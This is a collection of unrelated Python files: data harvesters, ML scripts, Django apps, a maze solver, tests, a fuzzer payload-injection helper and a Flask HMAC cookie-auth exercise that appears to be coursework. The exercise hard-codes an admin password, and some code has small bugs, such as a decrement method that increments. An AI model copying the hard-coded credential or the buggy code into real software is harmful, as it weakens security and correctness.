harvester.end_current_harvest()
if harvester.last_user_harvest_was_aborted:
aborted_user = harvester.get_current_harvested_user()
aborted_user.was_aborted = True
aborted_user.save()
logger.info(u"End REST: %s Stats:%s" % (harvester,unicode(harvester.get_stats())))
def run_harvester_search(harvester):
if True:
harvester.start_new_harvest()
logger.info(u"START SEARCH API: %s Stats:%s" % (harvester,unicode(harvester.get_stats())))
try:
all_twsearch = harvester.twsearch_to_harvest.all()
para_search_term(harvester, all_twsearch)
except twitter.TwitterError, e:
msg = u"ERROR for %s" % twsearch.term
logger.exception(msg)
finally:
harvester.end_current_harvest()
logger.info(u"End SEARCH API: %s Stats:%s" % (harvester,unicode(harvester.get_stats())))
logger.info(u"End: %s Stats:%s" % (harvester,unicode(harvester.get_stats())))
|
from api.sources.getter_definition import GetterDefinition
class CptecAPIGetter(GetterDefinition):
def __init__(self, latitude, longitude):
config = {
'url': 'http://servicos.cptec.inpe.br/XML/cidade/7dias/{0}/{1}/previsaoLatLon.xml',
'parser': 'xml'
}
GetterDefinition.__init__(self, config, latitude, longitude)
|
#!/usr/bin/python3
from threading import Timer
class Repeater(Timer):
def run(self):
while not self.finished.wait(self.interval):
self.function(*self.args, **self.kwargs)
class Counter:
UP = 1
DOWN = 0
def __init__(self):
self.count = 0
self.clk = 0
self.direction = self.UP
def clock(self,clk):
if self.clk == 0 and clk == 1:
if self.direction == self.UP:
self.inc()
elif self.direction == self.DOWN:
self.dec()
self.clk = clk
return self.count
def get(self,Q):
if Q < 32 and Q >= 0:
return self.count >> Q & 1
else:
return 0
def inc(self):
self.count += 1
return self.count
def dec(self):
self.count += 1
return self.count
class Toggle:
def __init__(self):
self.state = 0
def toggle(self):
self.state ^= 1
return self.state
def get(self):
return self.state
def set(self,state):
if state == 1:
self.state = 1
else:
self.state = 0
return self.state
c=Counter()
t=Toggle()
# def count(c):
# print(c.inc())
# def toggle(t):
# print(t.toggle())
def displayCount(c, t):
c.clock(t.toggle())
print(c.get(3))
t1 = Repeater(0.125, displayCount, [c, t])
t1.start()
|
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# This work is licensed under the Creative Commons Attribution-NonCommercial
# 4.0 International License. To view a copy of this license, visit
# http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to
# Creative Commons, PO Box 1866, Mountain View, CA 94042, USA.
import dnnlib
import argparse
import sys
import dnnlib.submission.submit as submit
import validation
# Submit config
# ------------------------------------------------------------------------------------------
submit_config = dnnlib.SubmitConfig()
submit_config.run_dir_root = 'results'
submit_config.run_dir_ignore += ['datasets', 'results']
desc = "autoencoder"
# Tensorflow config
# ------------------------------------------------------------------------------------------
tf_config = dnnlib.EasyDict()
tf_config["graph_options.place_pruned_graph"] = True
# Network config
# ------------------------------------------------------------------------------------------
net_config = dnnlib.EasyDict(func_name="network.autoencoder")
# Optimizer config
# ------------------------------------------------------------------------------------------
optimizer_config = dnnlib.EasyDict(beta1=0.9, beta2=0.99, epsilon=1e-8)
# Noise augmentation config
gaussian_noise_config = dnnlib.EasyDict(
func_name='train.AugmentGaussian',
train_stddev_rng_range=(0.0,50.0),
validation_stddev=25.0
)
poisson_noise_config = dnnlib.EasyDict(
func_name='train.AugmentPoisson',
lam_max=50.0
)
# ------------------------------------------------------------------------------------------
# Preconfigured validation sets
datasets = {
'kodak': dnnlib.EasyDict(dataset_dir='datasets/kodak'),
'bsd300': dnnlib.EasyDict(dataset_dir='datasets/bsd300'),
'set14': dnnlib.EasyDict(dataset_dir='datasets/Set14/image_SRF_2')
}
default_validation_config = datasets['set14']
corruption_types = {
'gaussian': gaussian_noise_config,
'poisson': poisson_noise_config
}
# Train config
# ------------------------------------------------------------------------------------------
train_config = dnnlib.EasyDict(
iteration_count=300000,
eval_interval=5000,
minibatch_size=4,
run_func_name="train.train",
learning_rate=0.0003,
ramp_down_perc=0.3,
noise=gaussian_noise_config,
# noise=poisson_noise_config,
noise2noise=True,
train_tfrecords='datasets/bsd300.tfrecords',
validation_config=default_validation_config
)
# Validation run config
# ------------------------------------------------------------------------------------------
validate_config = dnnlib.EasyDict(
run_func_name="validation.validate",
dataset=default_validation_config,
network_snapshot=None,
noise=gaussian_noise_config
)
# ------------------------------------------------------------------------------------------
# jhellsten quota group
def error(*print_args):
print (*print_args)
sys.exit(1)
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
# ------------------------------------------------------------------------------------------
examples='''examples:
# Train a network using the BSD300 dataset:
python %(prog)s train --train-tfrecords=datasets/bsd300.tfrecords
# Run a set of images through a pre-trained network:
python %(prog)s validate --network-snapshot=results/network_final.pickle --dataset-dir=datasets/kodak
'''
if __name__ == "__main__":
def train(args):
if args:
n2n = args.noise2noise if 'noise2noise' in args else True
train_config.noise2noise = n2n
if 'long_train' in args and args.long_train:
train_config.iteration_count = 50000
train_config.eval_interval = 500
train_config.ramp_down_perc = 0.5
else:
print ('running with defaults in train_config')
noise = 'gaussian'
if 'noise' in args:
if args.noise not in corruption_types:
error('Unknown noise type', args.noise)
else:
noise = args.noise
train_config.noise = corruption_types[noise]
if train_config.noise2noise:
submit_config.run_desc += "-n2n"
else:
submit_config.run_desc += "-n2c"
if 'train_tfrecords' in args and args.train_tfrecords is not None:
train_config.train_tfrecords = submit.get_path_from_template(args.train_tfrecords)
print('train_config-------------------')
print(train_config)
print()
dnnlib.submission.submit.submit_run(submit_config, **train_config)
def validate(args):
if submit_config.submit_target != dnnlib.SubmitTarget.LOCAL:
print ('Command line overrides currently supported only in local runs for the validate subcommand')
sys.exit(1)
if args.dataset_dir is None:
error('Must select dataset with --dataset-dir')
else:
validate_config.dataset = {
'dataset_dir': args.dataset_dir
}
if args.noise not in corruption_types:
error('Unknown noise type', args.noise)
validate_config.noise = corruption_types[args.noise]
if args.network_snapshot is None:
error('Must specify trained network filename with --network-snapshot')
validate_config.network_snapshot = args.network_snapshot
dnnlib.submission.submit.submit_run(submit_config, **validate_config)
def infer_image(args):
if submit_config.submit_target != dnnlib.SubmitTarget.LOCAL:
print ('Command line overrides currently supported only in local runs for the validate subcommand')
sys.exit(1)
if args.image is None:
error('Must specify image file with --image')
if args.out is None:
error('Must specify output image file with --out')
if args.network_snapshot is None:
error('Must specify trained network filename with --network-snapshot')
# Note: there's no dnnlib.submission.submit_run here. This is for quick interactive
# testing, not for long-running training or validation runs.
validation.infer_image(args.network_snapshot, args.image, args.out)
# Train by default
parser = argparse.ArgumentParser(
description='Train a network or run a set of images through a trained network.',
epilog=examples,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('--desc', default='', help='Append desc to the run descriptor string')
parser.add_argument('--run-dir-root', help='Working dir for a training or a validation run. Will contain training and validation results.')
subparsers = parser.add_subparsers(help='Sub-commands', dest='command')
parser_train = subparsers.add_parser('train', help='Train a network')
parser_train.add_argument('--noise2noise', nargs='?', type=str2bool, const=True, default=True, help='Noise2noise (--noise2noise=true) or noise2clean (--noise2noise=false). Default is noise2noise=true.')
parser_train.add_argument('--noise', default='gaussian', help='Type of noise corruption (one of: gaussian, poisson)')
parser_train.add_argument('--long-train', default=False, help='Train for a very long time (500k iterations or 500k*minibatch image)')
parser_train.add_argument('--train-tfrecords', help='Filename of the training set tfrecords file')
parser_train.set_defaults(func=train)
parser_validate = subparsers.add_parser('validate', help='Run a set of images through the network')
parser_validate.add_argument('--dataset-dir', help='Load all images from a directory (*.png, *.jpg/jpeg, *.bmp)')
parser_validate.add_argument('--network-snapshot', help='Trained network pickle')
parser_validate.add_argument('--noise', default='gaussian', help='Type of noise corruption (one of: gaussian, poisson)')
parser_validate.set_defaults(func=validate)
parser_infer_image = subparsers.add_parser('infer-image', help='Run one image through the network without adding any noise')
parser_infer_image.add_argument('--image', help='Image filename')
parser_infer_image.add_argument('--out', help='Output filename')
parser_infer_image.add_argument('--network-snapshot', help='Trained network pickle')
parser_infer_image.set_defaults(func=infer_image)
args = parser.parse_args()
submit_config.run_desc = desc + args.desc
print()
print('args-------------')
print(args)
print('****************************')
print()
if args.run_dir_root is not None:
submit_config.run_dir_root = args.run_dir_root
if args.command is not None:
args.func(args)
else:
# Train if no subcommand was given
train(args)
|
from django.contrib import admin
from allegro.models import UserProfile, Music, Event, PartFormat, Request
admin.site.register(UserProfile)
admin.site.register(Music)
admin.site.register(Event)
admin.site.register(PartFormat)
admin.site.register(Request)
|
import pygame, time, random
WINDOW_SIZE = (1000, 1000)
black = (0,0,0)
white = (255,255,255)
green = (0,255,0)
red = (255,0,0)
maze_size = int(input("Size of maze (nxn):"))
maze = []
for i in range(0,maze_size):
maze.append([])
for j in range(0,maze_size):
if random.randint(0,3) >= 1:
maze[i].append(0)
else:
maze[i].append(1)
maze[0][0] = 0
maze[0][maze_size-1] = 0
maze[maze_size-1][0] = 0
maze[maze_size-1][maze_size-1] = 0
delay = 3/maze_size
if (maze_size > 100):
delay = 0
"""
maze = [[1,0,0,1,0,1,0,1,0,1],
[1,1,0,1,0,1,0,0,1,0],
[1,0,0,1,0,0,0,1,0,0],
[0,0,1,0,0,0,1,0,1,1],
[1,0,0,0,0,0,1,1,1,1],
[0,0,1,0,1,1,1,1,1,1],
[0,1,0,0,1,1,1,1,0,0],
[0,0,0,1,1,0,0,0,1,0],
[0,1,0,1,0,0,1,0,0,0],
[0,1,0,0,0,1,1,1,1,0]]
"""
SQUARE_SIZE = (WINDOW_SIZE[0]-len(maze)-1)/len(maze)
pygame.init()
screen=pygame.display.set_mode(WINDOW_SIZE)
def solve(row,col):
if (maze[row][col] == 1):
return False
if (maze[row][col] == 2) or (maze[row][col] == 3):
return False
maze[row][col] = 2
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
return True
# color the board
screen.fill(white)
for row_1 in range(0, len(maze)):
for col_1 in range(0,len(maze[0])):
if maze[row_1][col_1] == 0:
pygame.draw.rect(screen, black, [(1 + SQUARE_SIZE) * col_1 + 1, (1 + SQUARE_SIZE) * row_1 + 1, SQUARE_SIZE, SQUARE_SIZE])
if maze[row_1][col_1] == 2:
pygame.draw.rect(screen, green, [(1 + SQUARE_SIZE) * col_1 + 1, (1 + SQUARE_SIZE) * row_1 + 1, SQUARE_SIZE, SQUARE_SIZE])
if maze[row_1][col_1] == 3:
pygame.draw.rect(screen, red, [(1 + SQUARE_SIZE) * col_1 + 1, (1 + SQUARE_SIZE) * row_1 + 1, SQUARE_SIZE, SQUARE_SIZE])
pygame.display.flip()
time.sleep(delay)
done = False
if (row == len(maze)-1) and (col == len(maze)-1):
print("solved")
done = True;
if (col != len(maze)-1) and (not done):
done = solve(row, col + 1)
if (row != len(maze)-1) and (not done):
done = solve(row + 1, col)
if (col != 0) and (not done):
done = solve(row, col - 1)
if (row != 0) and (not done):
done = solve(row - 1, col)
if (not done):
maze[row][col] = 3
return done
solve(len(maze)-1,0)
pygame.quit()
|
from .model_zoo import get_model
from .model_store import get_model_file
from .base import *
from .fcn import *
from .oc_module import *
from .psp import *
from .encnet import *
from .danet import *
from .resnet101_asp_oc import get_resnet101_asp_oc_dsn
from .resnet101_base_oc import get_resnet101_base_oc_dsn
from .resnet101_baseline import get_resnet101_baseline
from .resnet101_pyramid_oc import get_resnet101_pyramid_oc_dsn
from .emanet import get_emanet
from .galdnet import get_galdnet
from .deeplabv3 import get_deeplabv3
from .deeplabv3plus import get_deeplabv3plus
# from .ccnet import get_ccnet
def get_segmentation_model(name, **kwargs):
from .fcn import get_fcn
models = {
'fcn': get_fcn,
'psp': get_psp,
'encnet': get_encnet,
'danet': get_danet,
'asp_oc_dsn': get_resnet101_asp_oc_dsn,
'base_oc_dsn': get_resnet101_base_oc_dsn,
'pyramid_oc_dsn': get_resnet101_pyramid_oc_dsn,
'emanet': get_emanet,
'galdnet': get_galdnet,
'deeplabv3': get_deeplabv3,
'deeplabv3plus': get_deeplabv3plus
# 'ccnet': get_ccnet,
}
return models[name.lower()](**kwargs)
networks = {
'resnet101_baseline': get_resnet101_baseline,
'resnet101_base_oc_dsn': get_resnet101_base_oc_dsn,
'resnet101_pyramid_oc_dsn': get_resnet101_pyramid_oc_dsn,
'resnet101_asp_oc_dsn': get_resnet101_asp_oc_dsn,
}
def get_ocsegmentation_model(name, **kwargs):
return networks[name.lower()](**kwargs)
|
import theano
import theano.tensor as T
x = T.dmatrix('x')
s = 1 / (1 + T.exp(-x))
logistic = theano.function([x], s)
...
...
|
def rangify(v, lb, ub):
""" Returns a value bounded to a lower and an upper bound """
if lb >= ub:
lb, ub = ub, lb
return max(min(v, ub), lb)
|
"""
Archivo con las partes del turbohélice
Difusor,
"""
from air_model import RealGas
from isentropic_gas import IsentropicGas
import isa
import numpy as np
import generador_gas
air = RealGas(cp_option='naca', gamma_option='standard')
gas = IsentropicGas(selected_cp_air_model='naca', selected_gamma_air_model='standard')
# Función rendimiento de la turbina
def rend_turb(x):
if x < 1000:
return 0.88
elif x > 2000:
return 0.95
else:
return ((x - 1000) * 0.1 / 1000) + 0.88
# Cálculo del difusor
def difusor(mach, p0, T0):
# Difusor:
T2t = gas.stagnation_temperature_from_mach(mach, T0)
p2t = gas.stagnation_pressure_from_mach(mach, p0, T0)
return T2t, p2t
# Función rendimiento de la hélice
def rendimiento_helice(mach_i, alt_i):
altitud = []
rendimientos = np.zeros([12, 16])
mach = [0, 0.1, 0.2, 0.3, 0.35, 0.4, 0.45, 0.5, 0.55, 0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9]
for ii, alt in enumerate(np.linspace(0, 11000, 12)):
x = np.linspace(0, 1, 16)
altitud.append(alt)
rendimientos[ii] = (- (x - 0.2) ** 2) * (10 - ii) / 10
rendimientos[ii] = rendimientos[ii] + .95 ** 2 - 0.975 * ii / 11
rendimientos[ii] = rendimientos[ii] * ((ii + 12) / 11)
rendimientos[11] = rendimientos[11] * 0
altitud = np.asarray(altitud)
indice = np.where(altitud <= alt_i)
return np.interp(mach_i, mach, rendimientos[indice[-1][-1]])
def tubofan(G0, v0, rho0, T0, P0, T2t, T5t, p2t, p4t):
G_secundario = 5 * G0
Gtotal = G_secundario + G0
Afan = G0 / (rho0 * v0)
dfan = np.sqrt(Afan/np.pi*4)
T45t = T5t
T5_t = (T2t + T45t) * 0.5
Tturb2 = 0.5*(T45t + T5t)
p5_t = p4t * (1 + 1 / rend_turb(Tturb2) * (T5_t / T45t - 1)) ** (air.gamma_air(Tturb2) / (air.gamma_air(Tturb2) - 1))
T13t = 1/5 * air.cp_air(Tturb2) * (T45t - T5_t) /air.cp_air(T2t) + T2t
Tfan = 0.5*(T2t+T13t)
P13t = p2t * (0.8 * (T13t / T2t - 1) + 1) ** (air.gamma_air(Tfan) / (air.gamma_air(Tfan) - 1))
Ttob = (T5t + T0) / 2
Ttob2 = (T13t + T0) / 2
v19 = np.sqrt(2 * air.cp_air(Ttob2)*T13t*(1-(P0/P13t) ** ((air.gamma_air(Ttob2) - 1) / (air.gamma_air(Ttob2)))))
v9 = np.sqrt(2*air.cp_air(Ttob)*T5_t*(1-(P0/p5_t)**((air.gamma_air(Ttob)-1) / (air.gamma_air(Ttob)))))
return v9, v19, G_secundario
def actuaciones(G0, v9, v19, v0, G_secundario, c):
E_primario = G0 * (v9 - v0)
E_secundario = G_secundario * (v19 - v0)
Eneto = E_primario + E_secundario
Ie= Eneto / G0
Ce = c / Eneto
return Eneto, Ie, Ce, E_primario, E_secundario
def rendimiento_TB(c, v19, v9, v0, G0, E_primario, E_secundario, G_secundario):
eta_m = (G0 * 0.5 * (v9 ** 2 - v0 ** 2) + G_secundario * 0.5 * (v19 ** 2 - v0 ** 2)) / c / generador_gas.heating_value
eta_p = (E_primario + E_secundario)*v0 / (G0 * 0.5 * (v9 ** 2 - v0 ** 2) + G_secundario * 0.5 * (v19 ** 2 - v0 ** 2))
eta_mp = eta_m * eta_p
return eta_m, eta_p, eta_mp
|
# decision tree model
import pandas as pd
x = pd.read_csv("../../dataset/input_data.csv").to_numpy()
resp = pd.read_csv("../../dataset/output_data.csv").to_numpy()
##
from sklearn.decomposition import PCA
import numpy as np
pca = PCA(n_components = 1)
resp_pca = pca.fit_transform(resp)
y = (resp_pca > 0).astype("int")
y = np.ravel(y)
##
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.20, random_state = 1)
print("Train size:", y_train.shape[0], "; % trues:", np.sum(y_train)/y_train.shape[0])
print("Test size:", y_test.shape[0], "; % trues:", np.sum(y_test)/y_test.shape[0])
from sklearn.ensemble import AdaBoostClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import accuracy_score
# add gridsearch
DTC = DecisionTreeClassifier()
ABC = AdaBoostClassifier(base_estimator = DTC)
params = {"base_estimator__criterion" : ["gini", "entropy"],
"base_estimator__splitter" : ["best", "random"],
"n_estimators" : [50, 100, 500]}
# fit model
clf = GridSearchCV(ABC, params)
clf.fit(x_train, y_train)
# grid search results
results= pd.DataFrame.from_dict(clf.cv_results_)
print(results)
results.to_csv("../../results/adaboost_decisiontree.csv") # save as csv file
print("Best model score:", clf.best_score_)
print(clf.best_params_)
# predictions on training set
yhat_train = clf.predict(x_train)
print("Train Accuracy:", accuracy_score(y_train, yhat_train))
# predictions on test set
yhat_test = clf.predict(x_test)
print("Test Accuracy:", accuracy_score(y_test, yhat_test))
|
#!/usr/bin/python3
#coding:utf-8
# 数据集路径: http://grouplens.org/datasets/movielens/1m
import pandas as pd
import os
# 处理数据:将下载的dat文件格式转换成csv格式并保存,方便后续读取.
class Channel:
def __init__(self, dataDir='./data/'):
self.path = dataDir
def _process_user_data(self, file='users.dat'):
fullpath = os.path.join(self.path, file)
# 读取dat文件,转换成csv格式
f = pd.read_table(fullpath, sep='::', engine='python',names=['UserID', 'Gender', 'Age', 'Occupation', 'Zip-code'])
f.to_csv(os.path.join(self.path, 'users.csv'), index=False)
def _process_ratings_data(self, file='ratings.dat'):
fullpath = os.path.join(self.path, file)
f = pd.read_table(fullpath, sep="::", engine='python',names=['UserID','MovieID','Rating','Timestamp'])
f.to_csv(os.path.join(self.path, 'ratings.csv'), index=False)
def _process_movies_data(self, file='movies.dat'):
fullpath = os.path.join(self.path, file)
f = pd.read_table(fullpath, sep="::", engine='python',names=['MovieID','Title','Genres'])
f.to_csv(os.path.join(self.path, 'movies.csv'), index=False)
def process(self):
print("Process Movies Data...")
self._process_movies_data()
print("Moives Done!")
print("Process Ratings Data...")
self._process_ratings_data()
print("Ratings Done!")
print("Process Users Data...")
self._process_user_data()
print("Users Done!")
print("Done")
if __name__ == '__main__':
ch = Channel('./data')
ch.process() |
first = int(input())
second = int(input())
def factorial(a,b):
a_fact = 1
b_fact = 1
for i in range(1, a + 1):
a_fact = a_fact * i
for j in range(1,b + 1):
b_fact = b_fact * j
divide = a_fact / b_fact
return divide
dev = factorial(first, second)
print(f'{dev:.2f}')
|
from django.urls import include, path
from rest_framework.routers import DefaultRouter
from blogs.api import views as qv
router = DefaultRouter()
router.register(r"blogs", qv.BlogViewSet)
urlpatterns = [
path("", include(router.urls)),
path("blogs/<slug:slug>/comments/",
qv.CommentListAPIView.as_view(),
name="comments-list"),
path("blogs/<slug:slug>/comment/",
qv.CommentCreateAPIView.as_view(),
name="create-comments"),
path("comments/<int:pk>/",
qv.CommentRUDAPIView.as_view(),
name="comment-detail"),
path("comments/<int:pk>/like/",
qv.CommentLikeAPIView.as_view(),
name="comment-like"),
path("comments/<int:pk>/dislike/",
qv.CommentDisLikeAPIView.as_view(),
name="comment-dislike"),
path("blogs/<int:pk>/like/",
qv.BlogLikeAPIView.as_view(),
name="blog-like"),
path("blogs/<int:pk>/dislike/",
qv.BlogDisLikeAPIView.as_view(),
name="blog-dislike"),
] |
from fuzzer.main import PAYLOADS
from tokenizer import TOKEN
from utils.utils import get_max_threads
def generator_from_payload(tokenized_message: str) -> list:
message_applied_with_tokens = []
with open(PAYLOADS, 'r') as f:
for payload in f:
message_applied_with_tokens.append(replace_token_in_json(payload, tokenized_message))
return message_applied_with_tokens
def generator_list_huge_atoms(huge_atom_message: str):
for i in range(get_max_threads()):
yield huge_atom_message
def replace_token_in_json(payload: str, tokenized_message: str) -> str:
# Escape any quotes which are in the payload
payload = payload.strip()
payload = payload.replace('"', '\\"')
# Do the replace
modified_message = tokenized_message.replace(TOKEN, payload)
return modified_message
|
# @Author: aniket
# @Date: 2019-12-17T23:28:30+05:30
# @Last modified by: aniket
# @Last modified time: 2019-12-19T01:30:09+05:30
import roslib
import rospy
from ackermann_msgs.msg import AckermannDriveStamped
from std_msgs.msg import Int16
from ackermann_teleop.msg import cmd
from getkey import getkey, keys
import sys, select, termios, tty
import thread
from numpy import clip
control_keys = {
'w' : '\x77',
's' : '\x73',
'd' : '\x64',
'a' : '\x61',
'space' : '\x20',
'tab' : '\x09'}
key_bindings = {
'\x77' : ( 1.0 , 0.0),
'\x73' : (-1.0 , 0.0),
'\x64' : ( 0.0 ,-1.0),
'\x61' : ( 0.0 , 1.0),
'\x20' : ( 0.0 , 0.0),
'\x09' : ( 0.0 , 0.0)}
def servo_pub():
steering_angle = 90
speedy = 0
msg = cmd()
pub = rospy.Publisher('servo', cmd, queue_size = 5)
rospy.init_node('servo_pub', anonymous = True)
rate = rospy.Rate(10)
while not rospy.is_shutdown():
key = getkey()
if key in key_bindings.keys():
if key == control_keys['s'] and speedy > -1:
speedy = speedy - 1
elif key == control_keys['w'] and speedy < 1:
speedy = speedy + 1
elif key == control_keys['a'] and steering_angle > 60 :
steering_angle = steering_angle - 30
elif key == control_keys['d'] and steering_angle < 120:
steering_angle = steering_angle + 30
elif key == control_keys['space']:
speedy = 0
steering_angle = 90
elif key == '\x03' or key == '\x71': # ctr-c or q
break
else:
continue
msg.speedy = speedy
msg.steering_angle = steering_angle
rospy.loginfo(msg)
pub.publish(msg)
rate.sleep()
if __name__ == '__main__':
try:
servo_pub()
except rospy.ROSInterruptException:
pass
|
import pytest
from argparse import Namespace
from Bio import Phylo
from math import isclose
from phykit.services.tree.patristic_distances import PatristicDistances
@pytest.fixture
def args():
kwargs = dict(tree="/some/path/to/file.tre", verbose=None)
return Namespace(**kwargs)
class TestPatristicDistances(object):
def test_init_sets_tree_file_path(self, args):
t = PatristicDistances(args)
assert t.tree_file_path == args.tree
assert t.output_file_path is None
def test_read_file_reads_tree_file_path(self, mocker, args):
mock_read = mocker.patch("phykit.services.tree.base.Phylo.read")
t = PatristicDistances(args)
t.read_tree_file()
mock_read.assert_called_with(args.tree, "newick")
def test_calculate_patristic_distances(self, tree_simple, args):
t = PatristicDistances(args)
patristic_distances, combos, stats = t.calculate_patristic_distances(
tree_simple
)
assert isinstance(stats["mean"], float)
assert isinstance(stats["median"], float)
assert isinstance(stats["twenty_fifth"], float)
assert isinstance(stats["seventy_fifth"], float)
assert isinstance(stats["standard_deviation"], float)
assert isinstance(stats["variance"], float)
assert isinstance(stats["minimum"], float)
assert isinstance(stats["maximum"], float)
assert isclose(stats["mean"], 76.19737857142857, rel_tol=0.001)
assert isclose(stats["median"], 49.588789999999996, rel_tol=0.001)
assert isclose(stats["twenty_fifth"], 40.50536, rel_tol=0.001)
assert isclose(stats["seventy_fifth"], 108.13853, rel_tol=0.001)
assert isclose(stats["standard_deviation"], 45.46979239234539, rel_tol=0.001)
assert isclose(stats["variance"], 2067.5020202029905, rel_tol=0.001)
assert isclose(stats["minimum"], 24.0, rel_tol=0.001)
assert isclose(stats["maximum"], 152.88127, rel_tol=0.001)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('goods', '0009_auto_20161206_1510'),
]
operations = [
migrations.AlterField(
model_name='bigtype',
name='create_time',
field=models.DateTimeField(default=datetime.datetime(2016, 12, 6, 11, 27, 31, 711889, tzinfo=utc)),
),
migrations.AlterField(
model_name='carouselfigure',
name='create_time',
field=models.DateTimeField(default=datetime.datetime(2016, 12, 6, 11, 27, 31, 711210, tzinfo=utc)),
),
migrations.AlterField(
model_name='goods',
name='create_time',
field=models.DateTimeField(default=datetime.datetime(2016, 12, 6, 11, 27, 31, 713709, tzinfo=utc), verbose_name='\u53d1\u5e03\u65f6\u95f4'),
),
migrations.AlterField(
model_name='goodscollection',
name='collected_time',
field=models.DateTimeField(default=datetime.datetime(2016, 12, 6, 11, 27, 31, 715093, tzinfo=utc)),
),
migrations.AlterField(
model_name='smalltype',
name='create_time',
field=models.DateTimeField(default=datetime.datetime(2016, 12, 6, 11, 27, 31, 712742, tzinfo=utc)),
),
]
|
# -----------------------------------------------------------------------------
import hash_tabla as h
# -----------------------------------------------------------------------------
def teszt1() :
assert (h.hash_fuggveny("a") == 0)
assert (h.hash_fuggveny("z") == 25)
#
def teszt2() :
tabla = h.hash_tabla_letrehoz()
assert (type(tabla) is list)
assert (len(tabla) == 26)
return tabla
#
def teszt3(tabla) :
h.hash_tabla_betesz(tabla, "alma")
h.hash_tabla_betesz(tabla, "barack")
h.hash_tabla_betesz(tabla, "alma")
h.hash_tabla_betesz(tabla, "avokado")
h.hash_tabla_betesz(tabla, "korte")
assert (h.hash_tabla_benne_van(tabla, "alma") == True)
assert (h.hash_tabla_benne_van(tabla, "barack") == True)
assert (h.hash_tabla_benne_van(tabla, "avokado") == True)
#
def teszt4(tabla) :
h.hash_tabla_kivesz(tabla, "alma")
h.hash_tabla_kivesz(tabla, "avokado")
assert (h.hash_tabla_benne_van(tabla, "alma") == False)
assert (h.hash_tabla_benne_van(tabla, "avokado") == False)
#
def main():
# assert True # -> fut tovabb
# assert False # -> AssertionError
elvalaszto_sor = "\n" + ("-" * 79) + "\n"
print( elvalaszto_sor )
teszt1()
print( elvalaszto_sor )
tabla = teszt2()
print( elvalaszto_sor )
teszt3(tabla)
print( elvalaszto_sor )
teszt4(tabla)
print( elvalaszto_sor )
for c in "abcdefghijklmnopqrstuvwxyz" :
h.hash_tabla_betesz(tabla, c)
h.hash_tabla_debug(tabla)
print( elvalaszto_sor )
for c in "abcdefghijklmnopqrstuvwxyz" :
h.hash_tabla_kivesz(tabla, c)
h.hash_tabla_debug(tabla)
print( elvalaszto_sor )
#
# -----------------------------------------------------------------------------
if __name__ == "__main__" :
main()
#
# -----------------------------------------------------------------------------
"""
# https://stackoverflow.com/questions/5142418/what-is-the-use-of-assert-in-python/5142453#5142453
assert condition =>
if not condition:
raise AssertionError()
#
# https://stackoverflow.com/questions/5142418/what-is-the-use-of-assert-in-python/5143044#5143044
assert condition =>
if __debug__:
if not condition:
raise AssertionError
#
debug mod kikapcsolasa:
python -O automatikus_tesztek.py
""" |
from sys import exit
import csv
people = {
"GABE": 12345678,
"LUCAS": 23456789,
"MIKE": 34567890,
"EMMET": 87654321
}
if "GABE" in people:
print(f"Found {people['GABE']}")
else:
print("Not found")
name = input("name: ")
number = input("number: ")
with open("phonebook.csv", "a") as file:
writer = csv.writer(file)
writer.writerow((name, number))
|
import hmac
import os
from collections import defaultdict
from time import time
from base64 import b64encode, b64decode
from flask import Flask, request, make_response
app = Flask(__name__)
cookie_name = "LoginCookie"
def new_random(): return os.urandom(20)
secret_dict = defaultdict(new_random)
def compute_hmac(username, timestamp, user_type):
user_secret = secret_dict[username]
return hmac.new(user_secret, bytes(username + str(timestamp) + user_type, 'utf-8')).hexdigest().upper()
@app.route("/login",methods=['POST'])
def login():
# Get username and password from POST request
username = request.form['username']
password = request.form['password']
# Check if username and password exist
if (not username) | (not password):
return 'Invalid login data', 401
# Make cookie
cookie = ""
timestamp = round(time())
if username == 'admin' and password == '42':
cookie = '{},{},com402,hw2,ex2,admin,{}'.format(username, timestamp, compute_hmac(username, timestamp, 'admin'))
else:
cookie = '{},{},com402,hw2,ex2,user,{}'.format(username, timestamp, compute_hmac(username, timestamp, 'user'))
# Convert cookie to byte-like object and encode in base64
cookie = b64encode(bytes(cookie, 'utf-8'))
# Make response and attach the cookie
response = make_response('Welcome {}!'.format(username))
response.set_cookie(cookie_name, cookie)
return response
@app.route("/auth",methods=['GET'])
def auth():
cookie = request.cookies.get(cookie_name)
if not cookie:
return 'No cookie is present', 403
cookie = b64decode(cookie).decode('utf-8')
cookie_components = cookie.split(',')
# Check that the structure is right
if len(cookie_components) != 7:
return 'Cookie has been tampered with', 403
# Check HMAC is right
username = cookie_components[0]
timestamp = cookie_components[1]
user_type = cookie_components[5]
hmac_ = cookie_components[6]
if not hmac.compare_digest(hmac_, compute_hmac(username, timestamp, user_type)):
return 'Cookie has been tampered with', 403
if user_type == 'user':
return 'Have a simple user', 201
elif user_type == 'admin':
return 'Have an admin', 200
else:
return 'Cookie has been tampered with', 403
if __name__ == '__main__':
app.run() |
#!/usr/bin/python
import os
import bz2
import pdb
import settings
import json
import glob
msms = []
#files = filter(os.path.isfile, glob.glob("data/ripe/meta/meta_for_gr/" + "*"))
files = ['data/ripe/meta/meta-20150116.txt.bz2', 'data/ripe/meta/meta-20150406.txt.bz2', 'data/ripe/meta/meta-20150706.txt.bz2', 'data/ripe/meta/meta-20151005.txt.bz2',
'data/ripe/meta/meta-20160104.txt.bz2', 'data/ripe/meta/meta-20160411.txt.bz2', 'data/ripe/meta/meta-20160502.txt.bz2']
len_msms = []
for fname in files:
msms = []
print fname
with bz2.BZ2File(fname) as fi:
try:
for line in fi:
mmt = json.loads(line)
#if mmt['start_time'] < 1451606400: continue
if mmt['type']['name'] != 'traceroute': continue
msm_id = mmt['msm_id']
msms.append(msm_id)
msms = list(set(msms))
print max(msms)
len_msms.append(max(msms))
except EOFError:
continue
print len_msms
|
import collections
